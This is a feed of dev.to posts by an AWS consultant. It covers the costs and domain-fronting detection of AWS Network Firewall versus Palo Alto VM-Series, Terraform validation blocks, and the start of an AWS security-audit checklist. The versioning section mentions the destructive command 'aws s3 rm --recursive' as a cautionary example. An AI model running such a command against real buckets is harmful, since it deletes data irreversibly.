&lt;p&gt;&lt;strong&gt;Cost.&lt;/strong&gt; A VM-Series PAYG instance on the &lt;a href="https://aws.amazon.com/marketplace/pp/prodview-3xtziatyes54i" rel="noopener noreferrer"&gt;AWS Marketplace starts at $1.71/hour&lt;/a&gt; for a c5n.xlarge (the recommended instance type). That's the &lt;em&gt;software license alone&lt;/em&gt; - add the EC2 instance cost on top. For HA (which you want in production), double it. For multi-AZ, multiply again.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domain fronting detection requires SSL Decryption.&lt;/strong&gt; Threat ID 86467 &lt;a href="https://live.paloaltonetworks.com/t5/advanced-threat-prevention/how-to-detect-domain-fronting/td-p/253882" rel="noopener noreferrer"&gt;only works when the traffic is decrypted&lt;/a&gt; - either through SSL Forward Proxy or SSL Inbound Inspection. Without decryption, the firewall can't see the HTTP Host header to compare it against the SNI. By default, the signature action is &lt;code&gt;allow&lt;/code&gt; with &lt;code&gt;informational&lt;/code&gt; severity - you need to explicitly create a threat exception to block it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The cost math
&lt;/h2&gt;

&lt;p&gt;Let's compare a realistic production scenario: a centralized Security VPC in eu-central-1, two AZs, processing 500 GB of traffic per month.&lt;/p&gt;

&lt;h3&gt;
  
  
  AWS Network Firewall (with TLS inspection)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Monthly cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2 firewall endpoints x $0.489/h x 730h&lt;/td&gt;
&lt;td&gt;$714&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;500 GB x $0.065/GB&lt;/td&gt;
&lt;td&gt;$33&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$747/month&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Palo Alto VM-Series (PAYG, HA pair)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Monthly cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2 x VM-Series license x $1.71/h x 730h&lt;/td&gt;
&lt;td&gt;$2,497&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2 x c5n.xlarge EC2 x ~$0.34/h x 730h&lt;/td&gt;
&lt;td&gt;$496&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gateway Load Balancer x $0.0125/h x 730h&lt;/td&gt;
&lt;td&gt;$9&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLB data x $0.004/GB x 500 GB&lt;/td&gt;
&lt;td&gt;$2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$3,004/month&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That's a &lt;strong&gt;4x cost difference&lt;/strong&gt;. For some organizations, the additional security capabilities justify this. For others, they absolutely don't.&lt;/p&gt;

&lt;p&gt;The breakeven conversation is not about GB processed - it's about &lt;strong&gt;what a security incident would cost you&lt;/strong&gt;. If you're a fintech handling payment data, $3,000/month for a firewall that can actually detect domain fronting is cheap. If you're running internal dev tooling, AWS Network Firewall with TLS inspection is plenty.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to use which
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Recommendation&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Internal workloads, basic egress filtering&lt;/td&gt;
&lt;td&gt;AWS Network Firewall&lt;/td&gt;
&lt;td&gt;Simple, cheap, managed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-VPC with centralized inspection&lt;/td&gt;
&lt;td&gt;Either - depends on budget&lt;/td&gt;
&lt;td&gt;Both support Transit Gateway architectures&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PCI-DSS, HIPAA, SOX compliance&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;App-ID, granular logging, proven compliance track record&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid cloud (AWS + on-prem)&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;Same policies, same Panorama management plane&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain fronting / C2 detection required&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;Built-in detection (Threat ID 86467)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Budget under $1,000/month for firewall&lt;/td&gt;
&lt;td&gt;AWS Network Firewall&lt;/td&gt;
&lt;td&gt;VM-Series can't compete on price&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Team without Palo Alto expertise&lt;/td&gt;
&lt;td&gt;AWS Network Firewall + TLS inspection&lt;/td&gt;
&lt;td&gt;VM-Series has a learning curve&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Existing Palo Alto on-prem investment&lt;/td&gt;
&lt;td&gt;VM-Series&lt;/td&gt;
&lt;td&gt;Reuse policies, skills, and Panorama&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What I actually recommend to clients
&lt;/h2&gt;

&lt;p&gt;I don't tell every client to deploy Palo Alto. That would be irresponsible.&lt;/p&gt;

&lt;p&gt;For most startups and SMBs I work with, I recommend &lt;strong&gt;AWS Network Firewall with TLS inspection enabled from day one&lt;/strong&gt;. It covers 90% of use cases, costs a fraction of VM-Series, and doesn't require specialized Palo Alto expertise to maintain.&lt;/p&gt;

&lt;p&gt;But I always make sure they understand what it doesn't catch. I walk them through the SNI bypass scenario. I explain the ECH/QUIC gaps. And if they're in a regulated industry, or if they've had a security incident involving data exfiltration, or if they already run Palo Alto on-premises - then we talk about VM-Series and the centralized Security VPC architecture with Gateway Load Balancer.&lt;/p&gt;

&lt;p&gt;The worst outcome is deploying AWS Network Firewall with a domain allowlist and believing you're protected against data exfiltration. You're not. You're protected against accidental connections to the wrong domain. A determined attacker will walk right through it without TLS inspection - and even with TLS inspection, there are gaps.&lt;/p&gt;

&lt;p&gt;Security architecture is about understanding what your controls actually stop, and what they don't.&lt;/p&gt;




&lt;h3&gt;
  
  
  Sources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Jianjun Huo, &lt;a href="https://canglad.com/post/2023/aws-network-firewall-egress-filtering-can-be-easily-bypassed/" rel="noopener noreferrer"&gt;"AWS Network Firewall egress filtering can be easily bypassed"&lt;/a&gt;, September 2023 (updated February 2025)&lt;/li&gt;
&lt;li&gt;Hacking the Cloud, &lt;a href="https://hackingthe.cloud/aws/post_exploitation/network-firewall-egress-filtering-bypass/" rel="noopener noreferrer"&gt;"AWS Network Firewall Egress Filtering Bypass"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;"TLS inspection considerations"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS, &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;"Network Firewall Pricing"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS re:Post, &lt;a href="https://repost.aws/questions/QUGi6L4x4nRsCYc_FJ9aQkiQ/prevent-aws-network-firewall-host-header-spoofing" rel="noopener noreferrer"&gt;"Prevent AWS Network Firewall host header spoofing"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;MITRE ATT&amp;amp;CK, &lt;a href="https://attack.mitre.org/techniques/T1090/004/" rel="noopener noreferrer"&gt;"Domain Fronting T1090.004"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-new-features/content-inspection-features/domain-fronting-detection" rel="noopener noreferrer"&gt;"Domain Fronting Detection - PAN-OS 10.2"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClVSCA0" rel="noopener noreferrer"&gt;"How Palo Alto Networks identifies HTTPS applications without decryption"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://docs.paloaltonetworks.com/vm-series/10-2/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/vm-series-integration-with-gateway-load-balancer" rel="noopener noreferrer"&gt;"VM-Series Integration with AWS Gateway Load Balancer"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Marketplace, &lt;a href="https://aws.amazon.com/marketplace/pp/prodview-3xtziatyes54i" rel="noopener noreferrer"&gt;"VM-Series Next-Gen Virtual Firewall PAYG"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Palo Alto Networks LIVEcommunity, &lt;a href="https://live.paloaltonetworks.com/t5/advanced-threat-prevention/how-to-detect-domain-fronting/td-p/253882" rel="noopener noreferrer"&gt;"How to detect domain fronting"&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Designing a Security VPC for AWS with centralized traffic inspection? I've done this for enterprise clients across multiple industries. &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Why Every Terraform Module Needs Proper Validation</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Thu, 05 Mar 2026 11:01:13 +0000</pubDate>
      <link>https://dev.to/haitmg/why-every-terraform-module-needs-proper-validation-24bp</link>
      <guid>https://dev.to/haitmg/why-every-terraform-module-needs-proper-validation-24bp</guid>
      <description>&lt;p&gt;If you've ever deployed a Terraform module only to discover that someone passed a private subnet ID where a public one was expected, you know the pain. The deployment "succeeds", but nothing works. You spend 30 minutes debugging, only to realize the input was wrong from the start.&lt;/p&gt;

&lt;p&gt;Terraform has tools to prevent this. Most people don't use them.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem: Silent Misconfiguration
&lt;/h2&gt;

&lt;p&gt;Consider a simple NAT Gateway module:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"subnet_id"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Subnet to place the NAT Gateway in"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_nat_gateway"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;allocation_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_eip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="nx"&gt;subnet_id&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;subnet_id&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This accepts &lt;em&gt;any&lt;/em&gt; subnet ID. Public, private, doesn't matter. Terraform won't complain. AWS won't complain (immediately). But your private subnets won't have internet access, and you'll spend time figuring out why.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Fix: Validation Blocks
&lt;/h2&gt;

&lt;p&gt;Since Terraform 1.0, you can add &lt;code&gt;validation&lt;/code&gt; blocks to variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"public_subnet_ids"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Public subnet IDs for NAT Gateway placement"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="nx"&gt;validation&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"At least one public subnet ID is required."&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="nx"&gt;validation&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;alltrue&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nx"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="nx"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;startswith&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"subnet-"&lt;/span&gt;&lt;span class="p"&gt;)])&lt;/span&gt;
    &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"All values must be valid subnet IDs (starting with 'subnet-')."&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now &lt;code&gt;terraform plan&lt;/code&gt; fails immediately with a clear message if someone passes an empty list or garbage values.&lt;/p&gt;

&lt;h2&gt;
  
  
  Going Further: Preconditions
&lt;/h2&gt;

&lt;p&gt;For validations that need to check &lt;em&gt;relationships&lt;/em&gt; between variables, use &lt;code&gt;precondition&lt;/code&gt; blocks in &lt;code&gt;lifecycle&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_nat_gateway"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;single_nat_gateway&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="nx"&gt;allocation_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_eip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="nx"&gt;subnet_id&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

  &lt;span class="nx"&gt;lifecycle&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;precondition&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;single_nat_gateway&lt;/span&gt; &lt;span class="err"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public_subnet_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;private_route_table_ids&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
      &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"When using multi-AZ NAT, you need at least as many public subnets as private route tables."&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This catches architectural mistakes at plan time, not after a 10-minute apply.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Validate in Every Module
&lt;/h2&gt;

&lt;p&gt;After building &lt;a href="https://registry.terraform.io/namespaces/gebalamariusz" rel="noopener noreferrer"&gt;12 Terraform modules&lt;/a&gt; for AWS, here's my checklist:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Non-empty required lists&lt;/td&gt;
&lt;td&gt;Prevents silent no-ops&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ID format (&lt;code&gt;subnet-&lt;/code&gt;, &lt;code&gt;vpc-&lt;/code&gt;, &lt;code&gt;sg-&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Catches copy-paste errors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CIDR block format&lt;/td&gt;
&lt;td&gt;Regex validation on network inputs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mutually exclusive flags&lt;/td&gt;
&lt;td&gt;e.g., &lt;code&gt;single_nat_gateway&lt;/code&gt; vs per-AZ mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-variable consistency&lt;/td&gt;
&lt;td&gt;Preconditions on resource blocks&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  The Payoff
&lt;/h2&gt;

&lt;p&gt;Every validation you add is one fewer support ticket, one fewer "why isn't this working" Slack message, and one fewer hour lost to debugging obvious misconfigurations.&lt;/p&gt;

&lt;p&gt;The best part: these validations run during &lt;code&gt;terraform plan&lt;/code&gt;. Zero cost. Zero risk. Just faster feedback.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building Terraform modules for AWS? Check out the &lt;a href="https://registry.terraform.io/namespaces/gebalamariusz" rel="noopener noreferrer"&gt;HAIT module collection&lt;/a&gt; on the Terraform Registry.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>aws</category>
      <category>devops</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>17 AWS security issues I spot in almost every infrastructure audit</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Tue, 03 Mar 2026 18:54:28 +0000</pubDate>
      <link>https://dev.to/haitmg/17-aws-security-issues-i-spot-in-almost-every-infrastructure-audit-13k7</link>
      <guid>https://dev.to/haitmg/17-aws-security-issues-i-spot-in-almost-every-infrastructure-audit-13k7</guid>
      <description>&lt;p&gt;I've been doing cloud infrastructure audits for a while now - different companies, different industries, tiny teams and huge ones. And almost every time I open an AWS account, I run into the same set of problems.&lt;/p&gt;

&lt;p&gt;They're not exotic zero-days or clever multi-step attack chains. They're basic misconfigurations that stick around because no one ever circles back to clean them up.&lt;/p&gt;

&lt;p&gt;Here are the 17 checks I run every time. Most are 10-minute fixes. A lot of them have been sitting there for months.&lt;/p&gt;

&lt;h2&gt;
  
  
  IAM, the stuff everyone avoids
&lt;/h2&gt;

&lt;p&gt;IAM is boring. Reviewing policies is tedious. So it gets messy fast.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Root account without MFA
&lt;/h3&gt;

&lt;p&gt;This one always makes me uneasy. The root user can do &lt;em&gt;everything&lt;/em&gt;: billing changes, closing the account, changing the support plan - things even an IAM user with &lt;code&gt;AdministratorAccess&lt;/code&gt; can't do.&lt;/p&gt;

&lt;p&gt;And yet… I still find root accounts protected by just a password. No MFA. Sometimes the password is literally in a shared spreadsheet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fix: 5 minutes.&lt;/strong&gt; Go to IAM → &lt;strong&gt;Security credentials&lt;/strong&gt; and add MFA. Use a hardware key if you can, or a virtual MFA app if you can't. Skipping this is not an option.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. IAM users without MFA
&lt;/h3&gt;

&lt;p&gt;Same problem, but for regular humans. Someone creates a developer IAM user, enables console access, and MFA never gets set up. Six months later, that user has admin privileges and logs in from a random Wi-Fi network.&lt;/p&gt;

&lt;p&gt;I check every user with a console login profile. If they don't have at least one MFA device attached, that's a finding.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Access keys older than 90 days
&lt;/h3&gt;

&lt;p&gt;Access keys don't expire. If you don't rotate them, the same key pair works forever - until someone deactivates it.&lt;/p&gt;

&lt;p&gt;I regularly see keys that are 400, 600, even 900+ days old. They end up in CI/CD, hardcoded in scripts, or living in &lt;code&gt;.env&lt;/code&gt; files that got committed years ago.&lt;/p&gt;

&lt;p&gt;CIS recommends rotating every 90 days. Honestly, in 2026, if you're still relying on long-lived keys, strongly consider moving to IAM Identity Center or OIDC federation. If you must keep keys, rotate them.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Access keys that nobody uses
&lt;/h3&gt;

&lt;p&gt;This one's sneaky: an access key that's still "Active" but hasn't been used in 30+ days - or worse, was created and never used at all.&lt;/p&gt;

&lt;p&gt;Unused keys are pure risk with zero benefit. Like leaving a door unlocked to a room nobody ever enters. Delete them.&lt;/p&gt;

&lt;p&gt;AWS shows &lt;code&gt;LastUsedDate&lt;/code&gt;. If it says "None" or it's from last year: deactivate it, wait a week to ensure nothing breaks, then delete it.&lt;/p&gt;

&lt;h2&gt;
  
  
  S3, because it's always S3
&lt;/h2&gt;

&lt;p&gt;If you've been around cloud long enough, you've seen the headlines. Capital One, Twitch, even US military-related incidents - S3 comes up again and again. You'd think people would learn. They don't.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Buckets without Public Access Block
&lt;/h3&gt;

&lt;p&gt;S3 has "Block Public Access" and it's one of the best safety rails AWS has shipped. There are four toggles, and in most cases all four should be ON:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;BlockPublicAcls&lt;/li&gt;
&lt;li&gt;IgnorePublicAcls&lt;/li&gt;
&lt;li&gt;BlockPublicPolicy&lt;/li&gt;
&lt;li&gt;RestrictPublicBuckets&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With all four enabled, it doesn't matter if someone accidentally adds a public ACL or a wildcard bucket policy - S3 will refuse to go public.&lt;/p&gt;

&lt;p&gt;I still find buckets where one or more are off, or all four are disabled because "the app needs public access." No - it needs CloudFront with OAC, not a public bucket.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws s3api put-public-access-block &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--bucket&lt;/span&gt; my-bucket &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--public-access-block-configuration&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nv"&gt;BlockPublicAcls&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;,IgnorePublicAcls&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;,BlockPublicPolicy&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;,RestrictPublicBuckets&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One command wipes out a whole class of problems.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. No default encryption
&lt;/h3&gt;

&lt;p&gt;Since January 2023, AWS encrypts new S3 objects with SSE-S3 by default. But buckets created before that change might still not have default encryption configured.&lt;/p&gt;

&lt;p&gt;Your real threat model probably isn't someone stealing disks from an AWS datacenter - but compliance frameworks care. CIS cares. Auditors care. And it's basically free to enable.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Versioning disabled
&lt;/h3&gt;

&lt;p&gt;Not strictly security, but it's reliability - and I've watched teams lose important data because someone ran &lt;code&gt;aws s3 rm --recursive&lt;/code&gt; on the wrong prefix.&lt;/p&gt;

&lt;p&gt;Versioning keeps older copies of overwritten/deleted objects. It's cheap insurance. Turn it on for anything that matters.&lt;/p&gt;

&lt;h2&gt;
  
  
  EC2, where clutter quietly piles up
&lt;/h2&gt;

&lt;p&gt;EC2 is great at accumulating debt: old instances, forgotten AMIs, resources with no tags, things no one "owns" anymore. Every account has them.&lt;/p&gt;

&lt;h3&gt;
  
  
  8. Publicly shared AMIs
&lt;/h3&gt;

&lt;p&gt;Custom AMIs can contain credentials, internal config, baked-in secrets, proprietary software… and if someone makes one public (even by accident), anyone can launch it and inspect the filesystem.&lt;/p&gt;

